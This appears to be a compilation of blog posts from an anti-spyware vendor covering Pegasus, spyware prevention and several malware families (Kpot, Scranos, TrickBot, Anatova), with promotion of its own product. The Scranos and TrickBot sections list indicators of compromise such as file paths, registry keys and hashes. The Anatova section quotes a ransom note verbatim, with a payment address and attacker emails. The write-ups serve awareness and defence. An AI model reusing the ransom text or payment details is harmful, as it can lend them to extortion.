Spyware Abuse in Serbia Raises Privacy Concerns

Serbian flag spyware

Serbia Accused of Using Spyware to Target Journalists and Activists

Recent revelations have brought to light troubling reports of excessive digital surveillance and spyware abuse in Serbia, raising significant concerns about privacy violations and the targeting of journalists, activists, and political opponents. According to findings from Amnesty International and several investigative reports, Serbian authorities have allegedly deployed spyware and digital extraction tools to illegally monitor individuals and compromise their devices.

These alarming discoveries highlight a growing global trend of weaponizing spyware to suppress dissent, a practice that not only undermines personal privacy but also erodes fundamental human rights.

How Serbian Authorities Weaponized Spyware

At the center of the controversy is the use of advanced spyware technologies, including tools provided by Israeli tech firms and digital forensic systems like Cellebrite. Amnesty International’s report details how Serbian authorities have allegedly used spyware to hack into mobile devices, extract sensitive data, and monitor the communications of journalists and civil rights activists without legal justification.

One particularly disturbing case involved a prominent journalist whose phone was forcibly unlocked using Cellebrite tools. After gaining access, authorities reportedly planted spyware onto the device, allowing them to monitor private conversations, calls, messages, and location data. Such tactics not only violate privacy laws but also present a chilling attempt to suppress free speech and discourage public scrutiny of government activities.

While Serbia’s government has denied wrongdoing, the evidence presented points to a systemic abuse of surveillance tools to target critics and political adversaries. For activists, journalists, and ordinary citizens, the implications are dire—these tools can operate silently, compromising devices and stealing data without the victim’s knowledge.

Spyware and Its Threat to Privacy

Spyware is malicious software designed to infiltrate devices, monitor user activity, and extract data. While some spyware is marketed as lawful technology for legitimate investigations, it is increasingly being misused by governments and organizations to track individuals. The Serbian case is a stark reminder of how powerful spyware can be exploited for political and personal agendas.

Spyware can:

  • Access private messages, emails, and call logs.
  • Track GPS locations in real-time.
  • Hijack device microphones and cameras to record audio or video.
  • Exfiltrate sensitive files, including photos and documents.

Such capabilities make spyware an effective but dangerous tool in the hands of those seeking to intimidate or control targeted individuals. Victims often remain unaware of the breach until it is too late.

For those concerned about privacy, employing reliable spyware removal tools is critical to safeguarding their devices. Detection and timely removal of spyware can prevent long-term surveillance and data theft.

The Broader Implications of Digital Surveillance

The abuse of spyware in Serbia fits into a larger, troubling pattern seen across the globe. Governments in multiple regions have been accused of acquiring spyware tools to monitor political opponents, suppress dissent, and control media narratives. From Pegasus spyware scandals to Cellebrite forensic tools, the line between lawful investigation and unlawful surveillance continues to blur.

In Serbia’s case, the use of spyware against journalists is particularly concerning, as it directly undermines press freedom—a cornerstone of democracy. When journalists are unable to operate without fear of surveillance, it creates a chilling effect that stifles investigative reporting and silences critical voices.

Furthermore, the ability to extract and manipulate data raises additional fears of evidence tampering, blackmail, or disinformation campaigns. Activists and civil society groups are now calling for stronger international regulations to govern the sale and use of spyware technologies.

Protecting Yourself from Spyware

With digital surveillance becoming more sophisticated, individuals must take proactive steps to secure their devices and personal data. While spyware often operates covertly, there are several warning signs to watch for, including unusual device behavior, unexpected battery drain, or excessive data usage.

To protect against spyware, users should:

  • Regularly update device software to patch security vulnerabilities.
  • Avoid clicking suspicious links or downloading unknown files.
  • Use trusted anti-spyware tools to scan and remove malicious software.
  • Enable encryption and strong authentication methods for added security.

For comprehensive protection, SUPERAntiSpyware offers robust tools to detect and remove spyware, ensuring your devices remain secure against invasive monitoring.

Safeguarding Privacy in a Surveillance Age

The revelations surrounding spyware abuse in Serbia serve as a wake-up call about the risks of unchecked digital surveillance. When powerful tools fall into the wrong hands, the consequences for privacy, freedom, and democracy can be severe.

As spyware continues to proliferate, individuals must remain vigilant and proactive in protecting their devices from intrusion. Governments, meanwhile, face increasing pressure to implement safeguards that prevent the misuse of surveillance technologies.

For those concerned about spyware threats, understanding how these tools work—and taking steps to remove them—is critical. In an age where privacy is under constant attack, empowering yourself with reliable spyware protection has never been more important.

Understanding Pegasus Spyware

Pegasus malware spyware

What is Pegasus Spyware?

Many tech experts describe it as one of the most powerful pieces of spyware ever developed, but what is Pegasus spyware, and where did it come from? Pegasus is a sophisticated software capable of infiltrating smartphones and extracting vast amounts of sensitive information without the user’s knowledge. Its creators claim it was designed to combat crime and terrorism, but since its development its use for targeting journalists, activists and political figures has sparked global outrage from human rights groups such as Amnesty International.

Let’s take a look at its origins, its uses, and why the Pegasus spyware’s capabilities make it such a controversial piece of software.

Origins and development of Pegasus spyware

The earliest form of Pegasus spyware was identified in 2016. Here’s how it was created.

The NSO Group and its mission

The NSO Group, an Israeli cyber-arms company, developed Pegasus spyware in the early 2010s. The company markets itself as a provider of tools for governments and law enforcement agencies, claiming its technology is intended to fight crime, including anti-terrorism. According to the NSO Group, Pegasus was sold exclusively to vetted government clients under strict agreements to prevent misuse. Pegasus is the most famous NSO Group spyware, but not necessarily for the right reasons.

Initial deployment and intended use

Pegasus was initially deployed as a cutting-edge surveillance tool. Its capabilities allowed authorized agencies to intercept communications between suspects in an attempt to prevent criminal activity. Unlike traditional wiretapping, Pegasus was able to bypass encryption and access sensitive data directly from individuals’ devices, providing governments with unprecedented surveillance power. However, the Pegasus spyware capabilities soon raised concerns about the potential for abuse, with critics arguing that the spyware could easily be weaponized against dissidents and used to stifle free speech.

Technical capabilities of Pegasus spyware

Pegasus spyware is renowned for its sophisticated design and virtually undetectable operation. It can exploit vulnerabilities in both Android and iOS devices, granting attackers full access to a target’s smartphone and all of the information it holds.

Zero-click exploits

The standout feature of Pegasus is its use of zero-click exploits, which allow it to infect devices without any action from the target. Most forms of malware require the user to download a file or at least click a link in order to be installed on a device – but Pegasus is able to infiltrate a device via vulnerabilities in messaging apps, such as WhatsApp or iMessage.

Once deployed, Pegasus is extremely covert, leaving almost no traces on the infected device. It was initially thought that Pegasus left no evidence at all, but Amnesty International has publicly shared its methodology for detecting Pegasus on Android and iOS devices.

Data extraction and monitoring

Pegasus grants attackers nearly unlimited access to an infected device. Its capabilities include:

  • Accessing calls and messages, even those that have been encrypted, and being able to track communications across platforms.
  • Remotely activating microphones and cameras, effectively turning a smartphone into a surveillance device.
  • Monitoring GPS data to follow a target’s location in real time.
  • Harvesting any stored data, such as photos, videos, emails, contacts and browsing history.

Notable incidents involving Pegasus spyware

Pegasus has been linked to numerous high-profile incidents highlighting its misuse.

Surveillance of journalists and activists

In 2021, in an operation known as Project Pegasus, a months-long investigation led by dozens of news organizations revealed that Pegasus had been used to monitor journalists, activists, and human rights defenders worldwide. A list was uncovered of over 50,000 phone numbers potentially being targeted by Pegasus spyware. This widespread surveillance sparked understandable outrage among civil rights organizations, as it highlighted the ways in which Pegasus can be used as a tool to violate freedom of speech.

Political espionage allegations

As part of this report it was revealed that several world leaders were potentially being spied on through Pegasus spyware, including French President Emmanuel Macron and members of his government. This revelation and the political tension that followed underscored Pegasus’ ability to disrupt democratic processes and international relations.

Legal and ethical implications

As you can imagine, Pegasus has faced substantial legal scrutiny.

Legal action and investigations

There is currently an ongoing legal battle between the NSO Group and Meta, over the NSO Group exploiting vulnerabilities in platforms such as WhatsApp to deploy the Pegasus spyware. The initial lawsuit was filed in October 2019, but details have come to light as recently as this year that suggests the Israeli authorities have seized documents in an attempt to frustrate the case, and prevent the NSO Group’s activities from being revealed.

As of 2021, the NSO Group has been placed on a trade blacklist, restricting its ability to do business with US companies, in regards to Pegasus or any other NSO Group spyware. 

Human rights concerns

Pegasus raises profound ethical concerns. Human rights organizations argue that the spyware undermines fundamental freedoms such as privacy, free expression and the right to dissent. The ethical debate centers on whether such a powerful surveillance tool can ever be adequately regulated to prevent abuse. 

Protecting against advanced spyware threats

Pegasus is an example of a highly advanced form of spyware. While being able to protect against Pegasus spyware might seem like an intimidating task, there are steps individuals can take to reduce their risk of their devices being unknowingly infected. 

Regular software updates

Keeping your operating system and apps updated is one of the most effective defenses against all forms of malware. Security patches often address vulnerabilities that spyware, such as Pegasus, exploits. Enable automatic updates on your smartphone and computer to ensure you’re always protected.

Use of security tools

Make use of reputable antivirus or anti-spyware software to detect and block any potential threats before they have the chance to do harm. While advanced spyware such as Pegasus might be able to evade detection by the average Joe, basic protections will still be able to defend against the majority of cyber threats.

Awareness and vigilance

Be cautious of any suspicious messages, links or calls you receive, as phishing remains one of the most common methods of delivering spyware. Additionally, stay informed about emerging threats and best practices for device security. 

Clip spyware’s wings

While the average person might not have much to fear from Pegasus, it’s a chilling reminder of the potential dangers posed by advanced surveillance technology. While its origins may be rooted in a desire to fight crime, it’s easy to see how a tool such as Pegasus could be used in ways that challenge privacy and human rights.
To protect yourself from all forms of malware, expand your knowledge on the different forms that cyber threats can take, and reach out to experts such as the ones at SUPERAntiSpyware for tech support for safeguarding your digital life.

Effective Strategies to Prevent Spyware

Computer spyware malware

How to Prevent Spyware

With the amount of mics, cameras, and keyboards we surround ourselves with on a daily basis, why wouldn’t you be interested in how to prevent spyware from turning your devices into reconnaissance tools? It’s one thing to joke about the FBI watching us through our webcams, it’s another to know that the presence of spyware could mean everything you type is being transmitted straight to an opportunistic cybercriminal. 

Spyware is capable of compromising your personal information, stealing sensitive data, and even remotely controlling your device. By arming yourself with the right knowledge and tools, you can protect yourself from the consequences of this particularly unsettling form of cyberattack. Enjoy spyware prevention tips straight from the experts at SUPERAntiSpyware.

Understanding spyware and its risks

You can’t protect against spyware without knowing what it is. Unlike many viruses, spyware isn’t necessarily destructive – it’s designed to be sneaky, operating in the background and going undetected while it collects your data. 

What is spyware?

Spyware is malicious software designed to infiltrate your device – be it a computer, smartphone, or other IoT products – monitor your activities and steal data without your knowledge or consent. It can record keystrokes, track your location through GPS, and gather sensitive information such as passwords, credit card details, and even private conversations. Once this data is collected, it’s often transmitted back to the cybercriminals behind the spyware, putting your privacy and security at risk. This data is occasionally sold on to third parties.

Common types of spyware

  • Adware – tracks your online activities to deliver targeted advertisements. While not always harmful, adware can degrade the performance of your device and serve as a gateway for more dangerous spyware.
  • Keyloggers –  Keyloggers record your keystrokes to capture sensitive information such as login credentials and financial details.
  • Trojans – like the wooden horse from Greek mythology, trojan viruses often disguise themselves as legitimate software in order to gain access to your device. Once in place, they can then install spyware.
  • Cookies – while not inherently malicious, some cookies are used for extensive data collection, infringing on your privacy.
  • Monitoring software – can be installed without consent to track phone calls, messages, and even GPS locations.

Best practices for how to prevent spyware infections

Preventing any kind of virus requires a proactive approach to cybersecurity. Here are some spyware prevention tips to help ensure that cybercriminals don’t gain access to your sensitive data.

Install and maintain reputable anti-spyware software

The first line of defense against spyware is reliable security software.. Comprehensive anti-spyware software such as ours can do everything from regularly clearing your cookies to identifying, blocking and alerting you to spyware before it even has the chance to infiltrate your computer.

Keep your operating systems and applications up to date

Updates can often be seen as time-consuming tasks that you want to put off for as long as possible, but they can be vital for maintaining security. Outdated software often contains vulnerabilities that cybercriminals can exploit in order to install spyware. Keeping your operating systems and apps up to date ensures you’re protected by the latest security patches. If you struggle with remembering to update them yourself, enable automatic updates.

Be cautious with email attachments and other downloads

Phishing emails are the most common delivery methods for spyware and other forms of malware. It’s easy for emails to include malicious links designed to trick users into downloading spyware, and cybercriminals are becoming more adept at making these messages look legitimate. Be wary of any emails from an unknown sender, especially those urging you to open attachments or click on links. Email filters will send lots of phishing attempts to your spam folder, but some will always slip through – so stay vigilant.

Use pop-up blockers

Pop-ups can be more than just annoying – they’re often used to distribute spyware. Clicking on a malicious pop-up can initiate a download without your consent. Most browsers have built-in pop-up blockers, and most anti-spyware software will include this feature as well. 

Regularly review and manage your browser settings

Your browser can be like an open door for spyware if not properly configured. Regularly reviewing your browser settings can help to minimize the risks. Disable any unnecessary extensions, as these can sometimes carry spyware, and clear your cookies and browsing history regularly to prevent any unauthorized tracking.

Recognizing the signs of spyware infection

Even with the proper precautions to protect against spyware, it’s possible that something can slip through your security net. Knowing how to recognize an infection is critical to mitigating damage.

Decreased device performance

One of the earliest signs of spyware is a noticeable slowdown in your device’s performance. Spyware consumes resources, leading to lag and frequent crashes. Keep an eye out for your device becoming sluggish without an obvious cause – it’s possible spyware could be the culprit.

Pop-ups and browser redirects

Spyware often causes an influx of pop-ups, or redirects your browser to unfamiliar websites. This is a common tactic used by adware to generate revenue through clicks. If you have pop-ups appearing even when you’re not actively browsing, or your homepage seems to change without your consent or input, it might be down to spyware.

Increased data usage

Spyware will take the data it steals and transmit it back to its creators, which can result in unexplained spikes in your data usage. Monitor your monthly data usage through your device settings – this way, if there are any anomalies, you’ll be able to spot them.

Steps to take if you suspect a spyware infection

If you believe your device might be infected, take action as soon as you can.

Run a scan

Start by running a scan with your anti-spyware software of choice. Most modern security programs will detect and quarantine spyware automatically, but performing a full system scan can ensure that no malicious files are overlooked.

Update your software

Make sure that all of your software is up to date – this includes apps, your operating system and any security tools you use. This will ensure that you have the protection of all of the latest security patches. Continuing to run outdated software after a suspected infection can increase the likelihood of further attacks. 

Secure your accounts

If your device has been compromised it’s important to treat all of your accounts as having been put at risk. Change passwords for any critical accounts, such as your emails and any financial platforms, and enable two-factor authentication (2FA) where possible.

Shut down spies

Spyware might be persistent, but with vigilance, an understanding of how to prevent spyware from gaining access to your devices, and the right tools, you can protect your personal information. If you’re looking for software to keep your devices safe, consider our anti-spyware tool.

Mobile Spyware Detection Tips

Cell phone spyware

How to Check Your Phone for Spyware

Would you know how to check your phone for spyware if you suspected you were being spied on? Smartphones are essential to our daily lives, serving as our wallets, calendars, communication hubs and vaults for personal information – but they’re often overlooked when it comes to understanding the risks of spyware and other malicious software. Our phones’ convenience is also what makes them prime targets for cybercriminals, and spyware – malicious software designed to spy on your activities – can easily turn your phone into a surveillance device, if given the chance.

In this blog we’ll cover how to detect spyware, how to remove spyware from smartphones, and other mobile security tips that can keep your phone (and everything you use it for) safe and secure.

Understanding spyware on mobile devices

It’s a common misconception that spyware only infects PCs and other desktop devices. While the built-in security in smartphones has gotten better and better over time, cybercriminals have also continued to develop more sophisticated ways of countering those defenses. 

What Is spyware?

Spyware is a type of malicious software that secretly collects information from your device. It can monitor your calls, texts, browsing history, location, and even capture sensitive credentials such as your banking details and other passwords. Unlike some forms of malware, spyware is designed to operate discreetly, so that it can run in the background, unnoticed by the user, for as long as possible. This is one of the reasons why it’s so hard to detect spyware on phones and other devices.

There are various types of spyware, ranging from keyloggers to GPS tracking software. Some are tailored to target specific individuals, whereas others are used by organizations and governments for surveillance purposes. 

How does spyware infect smartphones?

Spyware can infiltrate smartphones in several ways:

  • Malicious apps, disguised as (or piggybacking on) legitimate apps or games, that infect your phone once installed.
  • Phishing links designed to lead the user to accidentally installing the malicious software.
  • Taking advantage of software vulnerabilities in outdated operating systems or apps.
  • Infecting devices through unsecured or public Wi-Fi networks.
  • Physical installation.

Understanding how spyware spreads is the first step to defending yourself from it. But how can you tell if your phone has already been compromised?

Signs that your phone may be infected with spyware

Spyware may be designed to operate covertly, but even the best spies have tells. Here are some of the ways to detect spyware on phones.

Unusual battery drain

Spyware constantly runs in the background, consuming your device’s resources such as CPU or GPS. This increased activity can sap your phone’s battery, and create a noticeable decrease in battery life. If you’ve noticed a change in the longevity of your phone’s battery life, it might be worth investigating further.

Increased data usage

Another red flag is unexplained spikes in your data usage. Spyware can transmit the data it steals back to its creator, but this requires significant bandwidth. Review your data usage regularly to spot any anomalies.

Slow performance and overheating

If your phone develops a habit of overheating, or is suddenly more sluggish than usual, spyware could be the cause. The constant background activity of malicious software puts a strain on hardware, leading to performance issues for your phone and frustration for you.

Strange behavior and notifications

Apps you don’t remember downloading, unexpected pop-ups, or texts from unknown sources could also indicate the presence of spyware. Similarly, if your phone makes unexplained calls, sends texts without your input, or experiences frequent crashes, it’s worth investigating further.

How to Check Your Phone for Spyware

If you suspect your phone might be compromised, follow these steps:

Review installed apps

Carefully examine your list of installed apps and their various permissions. Look for apps you don’t recognize or recall installing. Pay attention to apps with generic names, such as “System Update” or “Device Manager”. Research any suspicious apps you find online to see if they’ve been flagged by other users or cybersecurity experts.

Use safe mode

Booting your phone in safe mode disables third-party apps, making it easier to identify if a malicious app is causing the issue. For Android users, you can press and hold the power button until the Power Off option appears. Tap and hold Power Off, and the option for Safe Mode will appear.

Install security software

Comprehensive security software can detect and remove spyware, often identifying threats that are difficult to spot manually. Look for a reputable app from a trusted provider to scan your device – but avoid downloading free, unverified security apps that might be spyware in disguise.

Steps to remove spyware from smartphones

If you’ve managed to confirm the presence of spyware, taking action as soon as possible is crucial. 

Uninstall suspicious apps

Remove any and all apps you’ve identified as being potential threats. Make sure that you’re fully uninstalling these apps, not just removing them from your homepage. After uninstalling, monitor your phone for signs of improvement in performance and behavior.

Perform a factory reset

If the spyware persists, or you haven’t been able to identify its origins, a factory reset is the most effective solution. This will restore your phone to its original settings, erasing all apps, data and malware. Back up any files you want to save, such as pictures and contact details, before proceeding

Install security software

After removing suspicious apps or resetting your phone, install a trusted security app to safeguard it against future threats. Choose software with real-time threat detection, regular updates, and robust privacy protections. And, for good measure, carry out a scan on your phone as soon as it’s installed to make sure you haven’t missed any potential threats.

Don’t let spies crack your smartphone safe

Your smartphone is a treasure trove of personal information, and keeping it secure should always be a top priority. Spyware is a hidden threat that can compromise your privacy, steal sensitive data, and disrupt your device’s performance. By understanding the risks, learning how to recognize the warning signs, and taking proactive steps, you can protect yourself from spyware and other cyber threats. 

While you’re busy protecting your phone, you can trust SUPERAntiSpyware to protect your PC. For more PC and mobile security tips take a look at our resources.

Malicious Microsoft VSCode extensions steal passwords, open remote shells

*Content borrowed from bleepingcomputer.com.

Cybercriminals are starting to target Microsoft’s VSCode Marketplace, uploading three malicious Visual Studio extensions that Windows developers downloaded 46,600 times.

According to Check Point, whose analysts discovered the malicious extensions and reported them to Microsoft, the malware enabled the threat actors to steal credentials, system information, and establish a remote shell on the victim’s machine.

The extensions were discovered and reported on May 4, 2023, and they were subsequently removed from the VSCode marketplace on May 14, 2023.

However, any software developers still using the malicious extensions must manually remove them from their systems and run a complete scan to detect any remnants of the infection.

Malicious cases on the VSCode Marketplace

Visual Studio Code (VSC) is a source-code editor published by Microsoft and used by a significant percentage of professional software developers worldwide.

Microsoft also operates an extensions market for the IDE called the VSCode Marketplace, which offers over 50,000 add-ons that extend the application’s functionality and provide more customization options.

The malicious extensions discovered by Check Point researchers are the following:

‘Theme Darcula dark’ – Described as “an attempt to improve Dracula colors consistency on VS Code,” this extension was used to steal basic information about the developer’s system, including hostname, operating system, CPU platform, total memory, and information about the CPU.

While the extension did not contain other malicious activity, it is not typical behavior associated with a theme pack.

This extension had the most circulation by far, downloaded over 45,000 times.

Darcula extension on the VSCode Marketplace
Darcula extension on the VSCode Marketplace (Check Point)

‘python-vscode’ – This extension was downloaded 1,384 times despite its empty description and uploader name of ‘testUseracc1111,’ showcasing that having a good name is enough to garner some interest. 

Analysis of its code showed that it is a C# shell injector that can execute code or commands on the victim’s machine.

Obfuscated C# code injector
Obfuscated C# code injector (Check Point)

‘prettiest java’ – Based on the extension’s name and description, it was likely created to mimic the popular ‘prettier-java‘ code formatting tool.

In reality, it stole saved credentials or authentication tokens from Discord and Discord Canary, Google Chrome, Opera, Brave Browser, and Yandex Browser, which were then sent to the attackers over a Discord webhook.

The extension has had 278 installations.

Searching for local secrets
Searching for local secrets (Check Point)

Check Point also found multiple suspicious extensions, which could not be characterized as malicious with certainty, but demonstrated unsafe behavior, such as fetching code from private repositories or downloading files.

Software repositories come with risk

Software repositories allowing user contributions, such as NPM and PyPi, have proven time and time again to be risky to use as they have become a popular target for threat actors.

While VSCode Marketplace is just starting to be targeted, AquaSec demonstrated in January that it was fairly easy to upload malicious extensions to the VSCode Marketplace and presented some highly suspicious cases. However, they were not able to find any malware.

The cases discovered by Check Point demonstrate that threat actors are now actively attempting to infect Windows developers with malicious submissions, precisely like they do in other software repositories such as the NPM and PyPI.

Users of the VSCode Marketplace, and all user-supported repositories, are advised to only install extensions from trusted publishers with many downloads and community ratings, read user reviews, and always inspect the extension’s source code before installing it.

Related Articles:

The new info-stealing malware operations to watch out for

Facebook disrupts new NodeStealer information-stealing malware

New Atomic macOS info-stealing malware targets 50 crypto wallets

EvilExtractor malware activity spikes in Europe and the U.S.

Typhon info-stealing malware devs upgrade evasion capabilities

Kpot, The info stealer

Kpot, an older information stealer just got a major update and is seen in the wild again. This time Kpot brings zero persistence (meaning its never written to your computer) and instead does all of its attacks in memory before leaving your computer completely. Removing the ability to detect it without Real-time protection.

How it works

Kpot is delivered mainly through malicious email attachments, when opened they request permission to “Enable Editing” and appear to be unreadable without clicking on it. This attack vector, however, provides the attacker with full access to the computer. After the attack vector is used Kpot gets to work extracting as much as it can. First, it sends a message to its C&C server and asks what it should do. The reply can include many possible commands that can be updated in time, at the time of this writing it includes the following.

Browsers (Chrome, Mozilla, Internet Explorer): cookies, passwords, Autofill data, and history are taken and sent back to the C&C server.

Crypto: various cryptocurrency files. This can reveal numerous information regarding credentials, emails, and wallets depending on what the software used stores on the computer.

Discord: A chat interface advertised mainly to gamers: chat history, and user information can be stolen from files on the computer.

Battlenet: A game portal for World of Warcraft, StarCraft, and Diablo among others. Information regarding accounts can be stolen this way leading to compromised accounts without further fail safes such as 2-factor authentication.

Screenshots: Kpot can take pictures of what you are currently doing. This could be done when it recognizes open bank windows or other compromising information that may not be stored on your computer but are visible on the screen.

Windows credentials: Kpot can steal your windows account information such as username and password.

Grabber: A more advanced version than Qulab uses, Kpot uses its grabber to find any files that may have information but are not connected to an application. An example would be “passwords.txt” on the computer. Note that it does not focus on the naming and instead goes for taking any files ending in certain letters, such as txt, pdf, and doc to name a few.

Delete: Kpot uses this command to delete itself from the computer and any other evidence it might have been there.

Who is affected?

One of the scary things about Kpot is that is very affordable on the dark web. Coming in at only $100 with support optional it no longer takes a master hacker to obtain an information stealer that they can then use in a variety of ways. These could be slipped into downloads from illegitimate sources or used in malspam campaigns.

Indicators of Compromise

What you can do


If you or someone you know is infected with Kpot malware download SUPERAntiSpyware Professional right now and get a 14 day free trial, no credit card required.  SUPERAntiSpyware is easy to install and will detect and remove Kpot from any Windows computer. If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech04 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal

New cross platform rootkit: Scranos

Scranos is a new player to the global malware scene that leverages many well-known and some new methods to obtain login credentials and bank information. It can also steal or manipulate information from several online accounts to access your Amazon, Airbnb, Facebook, Steam, and YouTube accounts.

How it works

Scranos is installed through various methods, including:

  • cracked software
  • pirated videos and movies
  • legal alternative software such as e-book readers, video players, driver updaters, and fake antimalware products

When installed, Scranos installs a rootkit driver that ensures it remains on the computer unless removed by a legitimate antivirus program.

Once Scranos has gained persistence, it injects another running process with a downloader so that it can download other functionally. When it’s done, Scranos removes All downloaded contentfrom the computer to make it easier to keep itself hidden.

Among the functionality that Scranos downloads is a YouTube module.  This module launches Chrome (and installs it if it’s not already installed), goes to YouTube, mutes it, and subscribes to channels that the attackers use to earn money. Other methods Scranos uses to gain information include:

  • stealing information from various online platforms
  • modules that inject various false advertisement
  • bitcoin miners

In addition, Scranos has capabilities to infect other operating system such as Linux, IOS, and Android. These targets can be installed through phishing attempts from infected users’ Facebook messages.

Who is affected?

Scranos, due to its infection methods, can affect anyone, even those who do not download illegal software. While Scranos has been active in a testing form in several regions, it has been noticed on a global scale in recent months, indicating that testing may be done, or that they are testing on a larger scale. Either way, Scranos seems to just be getting started, and everyone is at risk.

Indicators of compromise

  1. YouTube or Facebook accounts showing activity during times it was not used
  2. %WINDIR%\System32\<random looking names>
  3. wcrx.exe
  4. Chrome extensions that the user didn’t install
  5. Y2B.EXE
  6. HKCU\Software\@demo
  7. HKLM\Software\Microsoft\@msver1
  8. HKLM\Software\Microsoft\@msver2
  9. HKLM\Software\Microsoft\@o2
  10. HKLM\Software\Microsoft\@o3

What you can do


If you or someone you know is infected with Scranos malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required. SUPERAntiSpyware is easy to install and will detect and remove Scranos from any Windows computer. If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech04 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

WinRAR Vulnerability

File compression has been an indispensable tool for computer users ever since it was first developed in the late 1980’s. Back then space on relatively small hard drives was at a premium, and compacting files that weren’t currently being used was a great way to free up a few valuable megabytes. These archived files also transferred faster over the slow, newborn internet.

Today there are many varieties of file compression: Zip, Gzip, RAR, 7z to name a few. WinRAR is a utility that allows you to compress/decompress most of the more common compressed file types, and many less-used types.

One of these lesser-used file types is called ACE. Recently a vulnerability has been found in WinRAR that can allow a malicious ACE archive to drop malware onto your system. This flaw has been present in WinRAR for 19 years but was just noticed earlier this year.

They have since patched their software with the release of version 5.70, but unfortunately WinRAR does not automatically check for updates. This means that there are millions of users out there with older versions of the software on their machine just waiting to be attacked.

Social engineering tactics have been used with these malicious archives, with adult photos or mp3s displayed inside them to entice the user to open the compressed file thereby infecting their system. Backdoors seem to be a common payload distributed by this process.

SUPERAntiSpyware can help protect you from many of the malware variants that have been distributed through this method. Along with keeping SUPERAntiSpyware’s definition database up-to-date, we recommend updating WinRAR to version 5.70 just to be safe.

TrickBot

TrickBot is once again making itself known during tax season and attempting to steal your hard-earned money. TrickBot was originally discovered in October of 2016 but has since changed and evolved dramatically into one of the most prolific hacking attacks today.

How it works

Just like Emotet, TrickBot primary spreads by specially designed emails or malspam that attempts to trick the user into clicking or downloading the attachment. The current campaign, as of this writing, is TrickBot’s normal tax season attack:  pretending to be the IRS. In the example below, the link will send you a to a domain that looks official but is slightly misspelled.

Once TrickBot is installed on a computer, it sets up a scheduled task to make sure it has a persistent presence on the computer before starting to steal information. In addition, it disables Windows Defender early on so that it won’t be removed. SUPERAntiSpyware is not stopped in this way.

TrickBot does not show any signs of running on a user’s computer and the only “noise” it makes is the network traffic it creates. Recording network traffic is generally only done by businesses, which helps TrickBot evade detection on personal computers.

TrickBot uses a module design, much like Emotet and other bankers.  Not only does this allow TrickBot to quickly change its attack capabilities, but it also makes it harder to detect. These modules often do one thing well rather than trying to do many things. Some are designed to go after hosted ftp servers, cached remote desktop credentials, and bitcoin mining accounts.

The most common module, however, allows TrickBot to redirect the user to fake bank sites that, instead of logging the user in, will steal account credentials. The scammers make this possible by domain squatting, or registering an internet address that is only slightly different than the one you intend to visit. For instance, if you receive an email about your GoDaddy account, you might not notice if a link in that email goes to godabdy.com/payyourbill  (godaddy is misspelled with a b instead of the second d).

This is compounded upon by hiding the URL so only the studious will look for it and by making the site look like you expect through careful recreation by the attackers. Many big companies will attempt to combat this by buying these fake sites and then redirecting them to the appropriate domain, but this is not always easily done.

Who is affected?

TrickBot is aimed more at business than casual users; however, it is still the number-one banker, and anyone who lives inside the USA, Africa, Europe, and Middle East should be wary. (This does not exclude other areas from being hit, just shows that they are not the current target.)

Indicators of Compromise

  1. C:\Documents and Settings\<USER>\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1275210071-920026266-1060284298-1003\8c8436195f6e0875edb85e34665c32ec_fabbc6a1-c573-4ea0-9ca1-50004b35a440
  2. C:\d2cc298a90c6ef939488b53ead12fd3549c3c0414733f6fdaf1762da31ea1e90
  3. sha256:  d2cc298a90c6ef939488b53ead12fd3549c3c0414733f6fdaf1762da31ea1e90       
  4. sha1: df404c6b1efc2cfbfdd0b7699554989dab03791f       
  5. md5: e580ca34929cf9b62e816adcebe715f2
  6. C:\Users\admin\AppData\Roaming\msscsc\e690ca34929cf9b72e917adcebe816f2.exe
  7. d2cc298a90c6ef939488b53ead12fd3549c3c0414733f6fdaf1762da31ea1e90         
  8. http://ip.anysrc.net/plain/clientip           
  9. Scheduled Task that points to a file in AppData such as C:\Users\<User>\AppData\Roaming\

What you can do


If you or someone you know is infected with TrickBot malware, download SUPERAntiSpyware Professional right now and get a 14 day free trial, no credit card required.  SUPERAntiSpyware is easy to install and will detect and remove TrickBot from any Windows computer. If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech04 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

Anatova

Anatova is the nickname given to a new brand of sophisticated ransomware that looks to encrypt your personal or business files and then demands payment to decipher them.

How it works

Anatova is distributed through peer-to-peer (P2P) file sharing networks. It masquerades as genuine software, often using real icons to fool users into believing it is authentic. Once you run the malicious software, it begins to encrypt your personal documents, after which it will demand you send payment to regain access to your files.

This can be extremely hazardous for larger organizations, since Anatova can affect files across local networks. This ransomware is designed to encrypt your files quickly to avoid detection. It fully encrypts files that are less than 1 Megabyte, and encrypts only a single Megabyte of files larger than that. Even though the larger files are not completely encrypted, enough damage has been done that they are, most likely, no longer usable.

Another fascinating thing about Anatova is its resistance to analysis. It encrypts most of its internal strings, cleans its own data out of memory, causes bugs in common analysis programs, and stops execution if it detects that it is in a virtual or test environment.

One of the most dangerous aspects of Anatova is the fact that it is built to be modular. This means that it was designed to have new features added to it at any time. Instead of just encrypting your files, future versions of Anatova could steal your personal info and passwords, add your computer to a malicious botnet, or a multitude of other things.

Who is affected

Due to its current distribution method, most people who do not use peer-to-peer file sharing should be safe from this threat. If you do you happen to use P2P file sharing, we strongly suggest you scan every file you download before opening it, both with SUPERAntiSpyware and VirusTotal.

The majority of Anatova detections have been in the United States, although infections have been seen across Europe as well. This malware checks your system language and refuses to run in several countries such as Iraq, India, and the Commonwealth of Independent States.

Indicators of compromise

Generally one of the biggest indicators of a ransomware attack is the changed extensions on the encrypted files. This ransomware, however, does not alter the file extensions, which makes casual detection of an Anatova infection more difficult.

A better indicator is the ransom note that this malware leaves behind. Anatova will drop a text file into each folder where it has encrypted a file. This text file gives instructions on how to pay the ransom to get your files unlocked:

All your files are crypted. Only us can decrypt your files, you need to pay 10 DASH in the address:

XnzvWQKv22uPDCYcuGebyoaVinekkJicbK

After the payment send us the address used to make the payment to one of these mail addresses:

anatova2@tutanota.com

anatoday@tutanota.com

